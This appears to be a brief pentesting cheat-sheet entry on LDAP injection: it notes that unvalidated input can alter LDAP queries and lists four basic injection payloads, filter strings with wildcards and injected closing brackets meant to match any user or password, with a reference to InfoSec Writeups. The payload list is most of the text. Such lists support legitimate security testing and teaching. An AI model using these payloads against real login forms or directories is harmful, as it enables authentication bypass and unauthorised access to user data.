LDAP Injection LDAP may be vulnerable to query injection if website does not properly validate user input. Basic Payloads (&uid=*)(userPassword=*) (&uid=*)|(userPassword=*) (&uid=*)|(objectClass=*)(userPassword=password123) *)(uid=*))(|(password=*) References InfoSec Writeups